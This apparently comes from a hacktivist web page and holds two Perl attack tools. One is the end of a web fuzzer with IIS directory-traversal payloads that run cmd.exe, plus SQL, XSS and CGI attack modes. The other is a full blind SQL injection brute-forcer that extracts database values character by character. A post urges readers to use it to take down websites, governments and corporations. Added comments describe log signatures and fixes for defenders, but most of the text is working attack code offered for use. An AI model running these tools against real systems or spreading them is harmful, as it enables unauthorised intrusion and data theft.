               “/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,
               “/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/c/winnt/system32/cmd.exe?/c+dir”,
               “/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/d/winnt/system32/cmd.exe?/c+dir”,
               “/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir”,
               “/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir”,
               “/msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir”,
               “/msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,
               “/msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir”
                            );

# Menu labels for the seven scan modes; the number typed at the prompt below
# selects which payload list is sent.
my @options = (“1)MySql Fuzz?\n”,”2)MSSQL Fuzz?\n”,”3)XSS fuzz?\n”,”4)CGI Fuzz?\n”,”5)Unicode Fuzz?\n”,”6)General Fuzz?\n”,
               “7)Fuck it, throw it all at it and lets see what happens,lol\n”);

# Banner. Two points matter to anyone handling this tool's output:
#  - the text names goodcode.html / badcodes.html, but openg() and openb()
#    append to goodcodes.htm and badcodes.htm;
#  - the saved files are raw server responses, so opening them in a browser
#    runs whatever markup and script the server returned. Review them in a
#    text viewer or an isolated VM.
print “***************************************************************************\n”;
print ”                              Perl Fuzzer                                  \n”;
print “***************************************************************************\n”;
print “General attack fuzzer. Perl Fuzzer sends attack strings then outputs the   \n”;
print “the results to an html file. The html files are named goodcode.html or     \n”;
print “badcodes.html depending on server response.You are receiving actual html   \n”;
print “code from the server once opening the file so XSS tends to fire off.All attack\n”;
print “responses will be returned to you in the way it would\’ve live in the browser.\n”;
print “all at once so keep this in mind. Also, be careful running a full scan unless\n”;
print “your system has a decent amount of memory. Opening the large html file can eat\n”;
print “up a large amount of memory. Smaller computers should stick with the single   \n”;
print “scan modes. Have fun 😀                                                       \n”;
print “*****************************************************************************\n”;
print “********Unauthorized scanning is illegal and I take no responsibility********\n”;
print “*****************************************************************************\n”;
foreach my $options(@options){
               print $options,”\n”;
}
# Scan mode is read interactively; the target comes from $ARGV[0].
print “Scan Type? 1-7:\n”;
my $res = <STDIN>;
chomp $res;

   # Dispatch on the menu choice. Every branch has the same body: append one
   # payload string to the target from $ARGV[0], issue a GET, and file the raw
   # response. A successful response goes to goodcodes.htm via openg(); any
   # status >= 400 goes to badcodes.htm via openb() and the script then exits.
   #
   # Defender notes: the script does no encoding or separator handling of its
   # own, so in access logs a run looks like consecutive GETs from one client
   # against one path prefix, with SQL keywords, traversal sequences or
   # cmd.exe paths directly in the request line. Those request-line patterns
   # are the thing to alert on. 'Skid-Bot' is passed positionally to
   # LWP::UserAgent->new rather than as a named option, so presumably the
   # User-Agent on the wire is LWP's default — do not key detection on
   # 'Skid-Bot' alone; confirm against captured traffic.
   #
   # The menu patterns are unanchored: /1/ also matches "17" or "21", and the
   # first matching branch wins.
   if($res =~ /1/){
   foreach my $scan(@MYSQL){
      # Inner $host is the outer target with the payload appended.
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      # $reponse is never read afterwards.
      my $reponse = HTTP::Response->new($resp);
    print “sending MYSQL attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
# exit sits inside the >= 400 branch: the first error response ends the run,
# so a target that answers payloads with 4xx/5xx sees only one request.
exit;
}}
}elsif($res =~ /2/){
   # Same body as option 1, iterating @MSSQL.
   foreach my $scan(@MSSQL){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending MSSQL attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /3/){
     # Same body, iterating @XSS. Reflected markup ends up in goodcodes.htm.
     foreach my $scan(@XSS){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending XSS attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /4/){
     # Same body, iterating @CGIs.
     foreach my $scan(@CGIs){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending CGI attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /5/){
      # Same body, iterating @Unicode.
      foreach my $scan(@Unicode){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending Unicode attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /6/){
      # Same body, iterating @Fuzzer.
      foreach my $scan(@Fuzzer){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending General attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /7/){
      # "All" mode as written iterates @MSSQL twice, then @XSS, @Unicode and
      # @CGIs. @MYSQL and @Fuzzer are not in this list, and @SQLtests and
      # @LFIlogs are not referenced by any branch.
      foreach my $scan(@MSSQL,@MSSQL,@XSS,@Unicode,@CGIs){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending All attack strings..This going to get is noisy!\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}
}}else{
   # Reached only when the input contains none of the digits 1-7.
   print “Error! Check the options and try again\n”;
}
# Opens goodcodes.htm in append mode on the global bareword handle FG.
# Called once per successful response; the open() result is not checked and
# the handle is never explicitly closed. The file accumulates raw response
# text from the scanned server, so treat it as untrusted content when
# reviewing it.
sub openg{
  open(FG, “>>goodcodes.htm”);
}
# Opens badcodes.htm in append mode on the global bareword handle FB.
# Called for a response with status >= 400, immediately before the script
# exits; the open() result is not checked. As with goodcodes.htm, the
# contents are raw server output and should be handled as untrusted.
sub openb{
  open(FB, “>>badcodes.htm”);
}

Blind SQL Injection Bruteforcer

Greetings Anons!

Our revolution has suffered much as of late, and it is necessary to step up our offensive methods. Defense is no longer the only option by which we can stick. We need to attack and take down oppressive websites, governments, and corporations worldwide. Below I have written a perl script for a blind sql bruteforcer. Enjoy and use with great fervor! Stay strong!

 

#!/usr/bin/perl
# Blind SQL Injection POC.omicronhatemail@gmail.com // TheRoyalAnon

use LWP::UserAgent;
use Getopt::Long;
use strict;

###############################################################################
# Built-in defaults; each is applied further down with ||= when the matching
# command-line option was not supplied.
my $default_debug = 0;
my $default_length = 32;
my $default_method = \”GET\”;
my $default_time = \”0\”;
my $version = \”1.1\”;
# Default User-Agent header is "bsqlbf" followed by the version string above.
# NOTE(review): unless -uagent or -ruagent overrides it, that literal ends up
# in the target's access log, which makes it a cheap log-search signature.
my $default_useragent = \”bsqlbf $version\”;
my $default_dict = \”dict.txt\”;
# Expression whose value is extracted when -sql is not given.
my $default_sql = \”version()\”;
###############################################################################

$| = 1;

my ($args, $abc, $solution);
my ($string, $char, @dic);
my (%vars, @varsb);
my ($lastvar, $lastval);
my ($scheme, $authority, $path, $query, $fragment);
my $hits = 0; 
my $usedict = 0; 
my $amatch = 0;
my ($ua,$req);

###############################################################################
# Define GetOpt:
my ($url, $sql, $time, $rtime, $match, $uagent, $charset, $debug);
my ($proxy, $proxy_user, $proxy_pass,$rproxy, $ruagent); 
my ($dict, $start, $length, $method, $cookie,$blind);
my $help;

my $options = GetOptions (
  \’help!\’           => \\$help, 
  \’url=s\’            => \\$url,
  \’sql=s\’             => \\$sql,
  \’blind=s\’           => \\$blind,
  \’match=s\’             => \\$match,
  \’charset=s\’       => \\$charset,
  \’start=s\’             => \\$start,
  \’length=s\’       => \\$length,
  \’dict=s\’           => \\$dict,
  \’method=s\’       => \\$method,
  \’uagent=s\’       => \\$uagent,
  \’ruagent=s\’       => \\$ruagent,
  \’cookie=s\’       => \\$cookie,
  \’proxy=s\’          => \\$proxy,
  \’proxy_user=s\’     => \\$proxy_user,
  \’proxy_pass=s\’     => \\$proxy_pass,
  \’rproxy=s\’     => \\$rproxy,
  \’debug!\’           => \\$debug, 
  \’rtime=s\’           => \\$rtime, 
  \’time=i\’           => \\$time );

&help unless ($url);
&help if $help eq 1;

#########################################################################
# Default Options.
$abc          = charset();
$uagent     ||= $default_useragent; 
$debug    ||= $default_debug; 
$length     ||= $default_length; 
$solution     ||= $start;
$method     ||= $default_method;
$sql         ||= $default_sql;
$time         ||= $default_time;

&createlwp();
&parseurl();

if ( ! defined($blind)) {
        $lastvar = $varsb[$#varsb];
        $lastval = $vars{$lastvar};
} else {
        $lastvar = $blind;
        $lastval = $vars{$blind};
}

if (defined($cookie)) { &cookie() }

if (!$match) {
    print \”\\nTrying to find a match string…\\n\” if $debug eq 1;
    $amatch = \”1\”;
    &auto_match();
}

&banner();
&httpintro();
&bsqlintro();
 
#########################################################################
# Define CHARSET to use. Dictionary /// (TODO: fix ugly code)

$dict ||= $default_dict;
open DICT,\”$dict\”;  @dic=<DICT>; close DICT;

# Extraction loop. $i is the 1-based character position, starting just past the
# known prefix ($start) and bounded by $length. For each position every
# candidate character in $abc is tried until a response contains $match.
#
# Defender's view: every candidate is one HTTP request in which the injected
# parameter keeps its normal value and gains the suffix
#   " AND MID(<sql>,<position>,1)=CHAR(<code>)".
# A run of near-identical requests to one URL that differ only in those two
# integers is the pattern to alert on in web or WAF logs. The root cause is a
# parameter concatenated into a SQL statement; binding it as a parameter
# (prepared statement) removes the true/false oracle this loop depends on.
my $i;
my $nodict = 0;
for ($i=length($start)+1;$i<=$length;$i++) {
    my $furl;
    my $find = 0;
    # Candidate set is recomputed for every position (dictionary-assisted or default).
    $abc = charset();
    &bsqlintro if $debug eq 1;
    print \”\\r trying: $solution \”;
    foreach (split/ */,$abc) {
        $find = 0; 
        # ord() with no argument works on $_, the current candidate character.
        $char = ord();
        $string = \” AND MID($sql,$i,1)=CHAR($char)\”;
        if (lc($method) eq \”post\”) {
           # POST: the suffix goes into the form value that fetch() submits.
           $vars{$lastvar} = $lastval . $string;
        }
        print \”\\x08$_\”;
        # GET: the suffix is spliced into the URL after "<param>=<value>".
        $furl = $url;
        $furl =~ s/($lastvar=$lastval)/$1$string/;
        # With -rproxy / -ruagent the client is rebuilt before each request, so
        # proxy and User-Agent can change from one request to the next.
        &createlwp if $rproxy || $ruagent;
        my $html=fetch(\”$furl\”);
        # $hits counts requests sent; result() prints it as "total hits".
        $hits++;
        foreach (split(/\\n/,$html)) {
             # A line containing the literal match string marks this candidate as correct.
             if (/\\Q$match\\E/) { 
                my $asc=chr($char);
                $solution .= $asc;
                $find = 1;
             }
            last if $find eq \”1\”;
            }
        last if $find eq \”1\”;
    }
    # Dictionary-derived charset failed: flag it and retry the same position.
    if ($usedict ne 0 && $find eq 0) { $nodict=1; $i–; }
    # Default charset failed too: stop, the value is taken to be complete.
    if ($find eq \”0\” && $usedict eq \”0\”) { last; };
}

&result();

#########################################################################
# Prints the HTTP-side settings as a formatted table: scheme, host, method,
# User-Agent, path, each parsed query argument, cookies, proxy host and proxy
# user. Display only; it reads the file-level variables and sends nothing.
# The proxy password is not printed.
sub httpintro {
    my ($strcookie, $strproxy, $struagent, $i);
    print \”–[ http options ]\”; print \”-\”x62; print \”\\n\”;
    printf (\”%12s %-8s %11s %-20s\\n\”,\”schema:\”,$scheme,\”host:\”,$authority);
    # With -ruagent the file name is shown, prefixed "rnd:", instead of one agent string.
    if ($ruagent) { $struagent=\”rnd:$ruagent\” } else { $struagent = $uagent }
    printf (\”%12s %-8s %11s %-20s\\n\”,\”method:\”,uc($method),\”useragent:\”,$struagent);
    printf (\”%12s %-50s\\n\”,\”path:\”, $path);
    # Hash iteration order, so the arg[n] numbering need not follow the URL order.
    foreach (keys %vars) {
        $i++;
        printf (\”%12s %-15s = %-40s\\n\”,\”arg[$i]:\”,$_,$vars{$_});
    }
    if (! $cookie) { $strcookie=\”(null)\” } else { $strcookie = $cookie; }
    printf (\”%12s %-50s\\n\”,\”cookies:\”,$strcookie);
    if (! $proxy && !$rproxy) { $strproxy=\”(null)\” } else { $strproxy = $proxy; }
    if ($rproxy) { $strproxy = \”rnd:$rproxy\” }
    printf (\”%12s %-50s\\n\”,\”proxy_host:\”,$strproxy);
    # $strproxy is reused here to hold the proxy user name.
    if (! $proxy_user) { $strproxy=\”(null)\” } else { $strproxy = $proxy_user; }
    printf (\”%12s %-50s\\n\”,\”proxy_user:\”,$strproxy);
}

# Prints the injection-side settings: injected parameter, known prefix, maximum
# length, SQL expression, current charset and the match string (labelled
# "auto match:" when it was derived automatically). Display only.
sub bsqlintro {
    my ($strstart, $strblind, $strlen, $strmatch, $strsql);
    print \”\\n–[ blind sql injection options ]\”; print \”-\”x47; print \”\\n\”;
    if (! $start) { $strstart = \”(null)\”; } else { $strstart = $start; }
    # Without -blind the last query parameter of the URL is the one shown.
    if (! $blind) { $strblind = \”(last) $lastvar\”; } else { $strblind = $blind; }
    printf (\”%12s %-15s %11s %-20s\\n\”,\”blind:\”,$strblind,\”start:\”,$strstart);
    if ($length eq $default_length) { $strlen = \”$length (default)\” } else { $strlen = $length; }
    if ($sql eq $default_sql) { $strsql = \”$sql (default)\”; } else { $strsql = $sql; }
    printf (\”%12s %-15s %11s %-20s\\n\”,\”length:\”,$strlen,\”sql:\”,$strsql);
    printf (\”%12s %-50s\\n\”,\”charset:\”,$abc);
    if ($amatch eq 1) { $strmatch = \”auto match:\” } else { $strmatch = \”match:\”; }
    #printf (\”%12s %-60s\\n\”,\”$strmatch\”,$match);
    print \” $strmatch $match\\n\”;
    print \”-\”x80; print \”\\n\\n\”;
}
#########################################################################

# Builds the global LWP::UserAgent ($ua) used by fetch(): picks proxy and
# User-Agent (getproxy / getuagent), attaches a cookie jar, sets the agent
# string and configures an HTTP proxy when one is set.
#
# Defender's view: the cookie jar is a file named "<pid>.cookie" in the working
# directory ($$ is the process id), a host-side artifact of a run. The main
# loop calls this sub again before each request when -rproxy or -ruagent is
# used, so source address and User-Agent are not stable identifiers for one
# run; correlate on the request pattern instead.
sub createlwp {
    my $proxyc;
    &getproxy;
    &getuagent;
    # "gt" is a string comparison on $debug.
    LWP::Debug::level(\’+\’) if $debug gt 3;
    $ua = new LWP::UserAgent(
        cookie_jar=> { file => \”$$.cookie\” }); 
    $ua->agent(\”$uagent\”);
    if (defined($proxy_user) && defined($proxy_pass)) {
        # Split the proxy URL with the generic URI regex and rebuild it with the
        # credentials embedded as scheme://user:pass@authority.
        my ($pscheme, $pauthority, $ppath, $pquery, $pfragment) =
        $proxy =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\\?([^#]*))?(?:#(.*))?|; 
        $proxyc = $pscheme.\”://\”.$proxy_user.\”:\”.$proxy_pass.\”@\”.$pauthority;
    } else { $proxyc = $proxy; }
    
    # The proxy is registered for the http scheme only.
    $ua->proxy([\’http\’] => $proxyc) if $proxy;
    # Clear the chosen values so the next call draws fresh ones from the files.
    undef $proxy if $rproxy;
    undef $uagent if $ruagent;
}    

# Sanity-checks the -cookie value: every ';'-separated piece must split on '='
# into a non-empty name and a non-empty value, otherwise the script dies.
# Nothing is stored; fetch() sends $cookie verbatim as the Cookie header.
sub cookie {
    # Cookies check
    # The second test can only be true when the first already is, so the
    # condition is effectively "if ($cookie)".
    if ($cookie || $cookie =~ /; /) {
        foreach my $c (split /;/, $cookie) {
            my ($a,$b) = split /=/, $c;
            if ( ! $a || ! $b ) { die \”Wrong cookie value. Use -h for help\\n\”; }
        }
    }
}

# Splits $url into the file-level $scheme, $authority, $path, $query and
# $fragment, then breaks the query string into %vars (name => value) and
# @varsb (names in URL order). Values are stored as they appear in the URL;
# no decoding is applied here.
sub parseurl {
 ###############################################################################
 # Official Regexp to parse URI. Thank you somebody.
    ($scheme, $authority, $path, $query, $fragment) =
        $url =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\\?([^#]*))?(?:#(.*))?|; 
    # Parse args of URI into %vars and @varsb.
    foreach my $varval (split /&/, $query) {
        my ($var, $val) = split /=/, $varval;
        $vars{$var} = $val;
        # @varsb keeps insertion order; the last entry is the default injection point.
        push(@varsb, $var);
    }
}

# Returns the candidate character set for the next position and stores it in
# the file-level $abc.
# Once at least one request has been sent ($hits) and the dictionary has not
# just failed ($nodict), the set is derived from the dictionary: for every
# non-comment line of @dic that contains the current $solution, the first
# occurrence of $solution is removed and the distinct remaining characters are
# collected in first-seen order. If that yields nothing, or in the other case,
# chardefault() supplies the set.
sub charset {
    if ($hits ne 0 && $nodict eq 0) {
        my (%tmp,@b,$foo); undef %tmp; undef @b; undef $abc;
        foreach my $line (@dic) {
            chomp $line; 
               if ($line =~ /\\Q$solution\\E/ && $line !~ /^#/) {
                $foo = $line; $foo =~ s/\\Q$solution\\E//;
                 foreach ((split/ */,$foo)) {
                      # %tmp de-duplicates; @b preserves order.
                      if ($tmp{$_} ne \”1\” ) {
                        $tmp{$_} = \”1\”; push (@b,$_);
                    }
                 }
            }
        }
            if ($#b >= 0) {
            foreach my $c (@b) { $abc .=$c;}
            # $usedict remembers the dictionary-derived set so chardefault()
            # can exclude those characters on a retry.
            $usedict = $abc;
            print \”\\nUsing a dictionary with this charset: $abc\\n\” if $debug eq 1;
         } else {
            $abc = chardefault()
         }
    } else {
            $abc = chardefault()
    }
    return $abc;
}

# Returns the non-dictionary character set and stores it in $abc.
# -charset md5 / num / all (or no -charset) select the built-in literals below;
# any other value is used as the set itself. Characters already tried through
# the dictionary ($usedict) are removed, then $usedict is reset to 0.
sub chardefault {
    my $tmp;
    $abc = $charset;
    if (lc($charset) eq \”md5\”) {
        $abc = \”abcdef0123456789\\$.\”;
    } elsif (lc($charset) eq \”num\”) {
        $abc = \”0123456789\”;
    } elsif (lc($charset) eq \”all\” || ! $charset) {
           $abc = \”abcdefghijklmnopqrstuvwxyz0123456789\\$.-_()[]{}Âş@=/\\\\|#?Âż&·!<>ñÑ\”;
    }
    # If a dictionary has been used before, remove chars from current charset
    if ($usedict ne 0) {
        foreach (split(/ */, $usedict)) {
            # Each character is interpolated into the pattern unescaped.
            $abc =~ s/$_//;
        }
    }
    $usedict = 0;
    return $abc;
}

# Sets the file-level $match to whatever fmatch() returns for the target URL;
# called from the main flow when no -match string was given.
sub auto_match {
      $match = fmatch(\”$url\”);
}

#########################################################################
# Show options at running:
# Prints the two-line banner to standard output; no other effect.
sub banner {
    print \”\\n // Blind SQL injection brute force.\\n\”;
    print \” // downloaded from securityoverride.com\\n\\n\”;
}

#########################################################################
# Get differences in HTML
# Derives a match string by requesting the page twice, once with " AND 1=1"
# and once with " AND 1=0" appended to the injected parameter, and returning a
# line of the first response that is absent from the second.
#
# Defender's view: the " AND 1=1" / " AND 1=0" pair sent back to back at one
# parameter is a boolean-based injection probe and a stable log or WAF
# signature. It works only where the page content differs between a true and
# a false condition; binding the parameter removes that difference.
sub fmatch {
 my ($ok,$rtrn);
 my ($furla, $furlb) = ($_[0], $_[0]);
 my ($html_a, $html_b);
 if (lc($method) eq \”get\”) {
    $furla =~ s/($lastvar=$lastval)/$1 AND 1=1/;
    $furlb =~ s/($lastvar=$lastval)/$1 AND 1=0/;
     $html_a = fetch(\”$furla\”);
    $html_b = fetch(\”$furlb\”);
 } elsif (lc($method) eq \”post\”) {
   # POST: the condition is placed in %vars, which fetch() submits as the form.
   $vars{$lastvar} = $lastval . \” AND 1=1\”;
   $html_a = fetch(\”$furla\”);
   $vars{$lastvar} = $lastval . \” AND 1=0\”;
   $html_b = fetch(\”$furla\”);
   # Restore the original value for later requests.
   $vars{$lastvar} = $lastval;
 }
 my @h_a = split(/\\n/,$html_a);
 my @h_b = split(/\\n/,$html_b);
 # Walk the "true" page and stop at the first line that contains a word
 # character and has no identical line in the "false" page.
 foreach my $a (@h_a) {
    $ok = 0;
    if ($a =~ /\\w/) {
           foreach (@h_b) {
            if ($a eq $_) {$ok = 1; }
        }
    } else { $ok = 1; }
   # $rtrn tracks the current line, so when no differing line exists the last
   # line of the "true" page is what gets returned.
   $rtrn = $a;
   last if $ok ne 1;
 }
 return $rtrn;
}

#########################################################################
# Fetch HTML from WWW
# Sends one request through the global $ua and returns the response body.
# A delay is applied first: -time 0/1/2 maps to 0, 15 or 300 seconds, and
# -rtime appears intended to draw a random delay from a "low-high" range;
# combining the two prints an error and exits.
# GET requests the URL passed in $_[0]; POST rebuilds scheme://authority/path
# from the global $url and submits %vars as the form. The Cookie header is
# added when -cookie was given. The HTTP status is not inspected.
#
# Defender's view: the built-in delays reach five minutes per request, so a
# pure requests-per-minute threshold is not sufficient to notice a run; match
# on the injected parameter content as well.
sub fetch {
    my $secs;
    if ($time eq 0) { $secs = 0 }
    elsif ($time eq 1) { $secs = 15 }
    elsif ($time eq 2) { $secs = 300 }
    if ($rtime =~ /\\d*-\\d*/ && $time eq 0) {
        my ($l,$p) = $rtime =~ m/(\\d+-\\d+)/;
        srand; $secs = int(rand($p-$l+1))+$l;
    } elsif ($rtime =~ /\\d*-\\d*/ && $time ne 0) {
        print \”You can\’t run with -time and -rtime. See -help.\\n\”;
        exit 1;
    }
    sleep $secs;
    
    my $res;
    if (lc($method) eq \”get\”) {
        my $fetch = $_[0];
        if ($cookie) {
            $res = $ua->get(\”$fetch\”, Cookie => \”$cookie\”);
        } elsif (!$cookie) {
            $res = $ua->get(\”$fetch\”);
        }
    } elsif (lc($method) eq \”post\”) {
        # The argument is ignored for POST; the target is rebuilt from $url
        # without its query string.
        my($s, $a, $p, $q, $f) =
          $url=~m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\\?([^#]*))?(?:#(.*))?|; 
        my $fetch = \”$s://$a\”.$p;
        if ($cookie) {
            $res = $ua->post(\”$fetch\”,\\%vars, Cookie => \”$cookie\”);
        } elsif (!$cookie) {
            $res = $ua->post(\”$fetch\”,\\%vars);
        }
    } else {
        die \”Wrong httpd method. Use -h for help\\n\”;
    }
    my $html = $res->content();
    return $html;
}

# When -rproxy names a file and no http proxy is already set, reads the file,
# skips lines starting with '#', and stores one randomly chosen line in the
# global $proxy. If both -rproxy and an http -proxy are present it prints an
# error and exits. Dies when the file cannot be opened.
sub getproxy {
    if ($rproxy && $proxy !~ /http/) {
        my @lproxy;
        open PROXY, $rproxy or die \”Can\’t open file: $rproxy\\n\”;
        while(<PROXY>) { push(@lproxy,$_) if ! /^#/ }
        close PROXY;
        # rand on an array yields a fractional index; Perl truncates it on lookup.
        srand; my $ind = rand @lproxy;
        $proxy = $lproxy[$ind];
    } elsif ($rproxy && $proxy =~ /http/)  {
        print \”You can\’t run with -proxy and -rproxy. See -help.\\n\”;
        exit 1;
    }
}

# When -ruagent names a file and the current agent string does not contain
# "bsqlbf", reads the file, skips lines starting with '#', and stores one
# randomly chosen line in the global $uagent. Dies when the file cannot be
# opened.
# NOTE(review): the elsif repeats the condition of the if, so the
# "-uagent and -ruagent" error branch cannot be reached as written.
sub getuagent {
    if ($ruagent && $uagent !~ /bsqlbf/) {
        my @uproxy;
        open UAGENT, $ruagent or die \”Can\’t open file: $ruagent\\n\”;
        while(<UAGENT>) { push(@uproxy,$_) if ! /^#/ }
        close UAGENT;
        srand; my $ind = rand @uproxy;
        $uagent = $uproxy[$ind];
    } elsif ($ruagent && $uagent !~ /bsqlbf/)  {
        print \”You can\’t run with -uagent and -ruagent. See -help.\\n\”;
        exit 1;
    }
}

# Prints the extracted value as "<sql> = <solution>" when anything was
# recovered (the two variants differ only in the leading \r or \n, chosen by
# $debug), followed by the number of requests sent.
sub result {
    print \”\\r results:                                  \\n\” .
     \” $sql = $solution\\n\” if length($solution) gt 0 and $debug eq 0;
    print \”\\n results:                                  \\n\” .
     \” $sql = $solution\\n\” if length($solution) gt 0 and $debug eq 1;
    print \” total hits: $hits\\n\”;
}

sub help {
    &banner();
    print \” usage: $0 <-url http://www.host.com/path/script.php?foo=bar&gt; [options]\\n\”;
    print \”\\n options:\\n\”;
    print \” -sql:\\t\\tvalid SQL syntax to get; connection_id(), database(),\\n\”;
    print \”\\t\\tsystem_user(), session_user(), current_user(), last_insert_id(),\\n\”; 
    print \”\\t\\tuser() or all data available in the requested query, for\\n\”;
    print \”\\t\\texample: user.password. Default: version()\\n\”;
    print \” -blind:\\tparameter to inject sql. Default is last value of url\\n\”;
    print \” -match:\\tstring to match in valid query, Default is try to get auto\\n\”;
    print \” -charset:\\tcharset to use. Default is all. Others charsets supported:\\n\”;
    print \” \\tall:\\tabcdefghijklmnopqrstuvwxyz0123456789\\$.-_()[]{}Âş@=/\\\\|#?Âż&·!<>ñÑ\\n\”;
    print \” \\tnum:\\t0123456789\\n\”;
    print \” \\tmd5:\\tabcdef0123456789\\$\\n\”;
    print \” \\tcustom:\\tyour custom charset, for example: \\\”abc0123\\\”\\n\”;
    print \” -start:\\tif you know the beginning of the string, use it.\\n\”;
    print \” -length:\\tmaximum length of value. Default is $default_length.\\n\”;
    print \” -dict:\\t\\tuse dictionary for improve speed. Default is dict.txt\\n\”;
    print \” -time:\\t\\ttimer options:\\n\”;
    print \” \\t0:\\tdont wait. Default option.\\n\”;
    print \” \\t1:\\twait 15 seconds\\n\”;
    print \” \\t2:\\twait 5 minutes\\n\”;
    print \” -rtime:\\twait random seconds, for example: \\\”10-20\\\”.\\n\”;
    print \” -method:\\thttp method to use; get or post. Default is $default_method.\\n\”;
    print \” -uagent:\\thttp UserAgent header to use. Default is $default_useragent\\n\”;
    print \” -ruagent:\\tfile with random http UserAgent header to use.\\n\”;
    print \” -cookie:\\thttp cookie header to use\\n\”;
    print \” -rproxy:\\tuse random http proxy from file list.\\n\”;
    print \” -proxy:\\tuse proxy http. Syntax: -proxy=http://proxy:port/\\n\”;
    print \” -proxy_user:\\tproxy http user\\n\”;
    print \” -proxy_pass:\\tproxy http password\\n\”;
    print \”\\n example:\\n bash# $0 -url http://www.somehost.com/blah.php?u=5 -blind u -sql \\\”user()\\\”\\n\”;
    exit(1);

Our Inalienable Right to Freedom

